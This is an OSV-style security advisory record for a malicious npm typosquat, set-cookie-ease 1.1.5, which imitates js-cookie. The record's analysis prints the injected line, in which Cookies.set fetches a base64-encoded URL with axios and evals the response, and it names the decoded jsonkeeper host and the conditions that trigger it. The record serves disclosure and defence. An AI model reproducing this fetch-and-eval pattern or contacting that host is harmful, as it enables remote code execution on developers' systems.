{"id":"MAL-2026-6500","summary":"Malicious code in set-cookie-ease (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6)\nPackage masquerades as js-cookie (same banner `/*! js-cookie v3.0.5 | MIT */`, README, and `repository.url: git://github.com/js-cookie/js-cookie.git`) but diverges in `dist/cookie.ease.js`. At lines 46-49, the `Cookies.set` implementation contains `if (typeof document === 'undefined' || attributes.expires == 0) { require('axios').get(atob('...')).then(r =\u003e { eval(r.data.content) }); return }`. The base64 string decodes to `https://www.jsonkeeper.com/b/VKUNI`, a public mutable JSON-bin where the maintainer can swap the payload at any time. The branch fires whenever `document` is undefined (any Node/SSR consumer — Next.js, Nuxt, Remix, etc.) or when a caller passes `expires: 0`, executing arbitrary attacker-controlled JavaScript inside the consumer's Node process with full host privileges. To support this, `package.json` adds `axios` and `request` as dependencies despite the README advertising 'No dependency'. This satisfies the typosquat-with-malicious-payload class: installer harm is concrete (RCE on first Cookies.set call in Node) and the destination is attacker-mutable.\n","modified":"2026-06-26T03:31:24.739047865Z","published":"2026-06-26T02:18:30Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.1.5"],"id":"IN-MAL-2026-007581","import_time":"2026-06-26T03:14:43.424094543Z","sha256":"b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6","modified_time":"2026-06-26T02:18:30Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/set-cookie-ease/v/1.1.5"}],"affected":[{"package":{"name":"set-cookie-ease","ecosystem":"npm","purl":"pkg:npm/set-cookie-ease"},"versions":["1.1.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/set-cookie-ease/MAL-2026-6500.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"2a91026c28e625e21f072039dbaf65007274d51b049ede60bc8ce3621f6ac3916f5aed","path":"dist/cookie.ease.js","sha256":"540960191cc1f421c1c9fa10e2d77034785ecfc0b5b86fae9355a919fcb26d01"},{"tlsh":"a741db2cec1c4ea70ae81ae9295a1282b52094035d40fc4d7362272c4f5e55f31ff7bd","path":"package.json","sha256":"189969a958cb206853853d515f1e367e5c9d6dd985fea423501913776b81f8da"}],"package_integrity":[{"hashes":{"sha1":"c8ad5bbfba3c521bb5aadbb94070b790d74bd8b6","sha512_sri":"sha512-Tq+kA4M9dTWGV2lVharZMCMEPHmGIrBtexa9GA0nQhtz19yD5u39QOJjiSNxXej3REc8ybooC9HdPhtK5KEOxA=="},"filename":"set-cookie-ease-1.1.5.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}